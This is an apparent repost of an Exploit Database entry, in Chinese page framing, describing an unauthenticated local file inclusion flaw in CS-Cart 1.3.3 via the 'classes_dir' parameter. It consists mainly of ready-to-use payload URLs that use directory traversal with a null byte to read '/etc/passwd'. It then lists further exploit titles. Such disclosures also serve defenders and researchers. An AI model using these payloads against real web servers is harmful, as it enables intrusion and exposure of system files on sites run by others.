CS-Cart 1.3.3 – ‘classes_dir’ LFI

Exploit Database
36 阅读

作者： 0xmmnbassel

日期： 2020-10-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48890/

# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

last Exploits
CS-Cart 1.3.3 – ‘classes_dir’ LFI的更多信息

Ad Manager Pro 4 – Local File Inclusion：
Site Manager 3.0 – ‘id’ SQL Injection：
CLscript Classified Script 3.0 – SQL Injection：
Ericsson Drutt MSDP (Instance Monitor) – Directory Traversal：
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 – Cross-Site Request Forgery：
Responsive FileManager 9.13.4 – Multiple Vulnerabilities：
Joomla! Component jDownloads 3.2.58 – Cross Site Scripting：
SynTail 1.5 Build 566 – Multiple Vulnerabilities：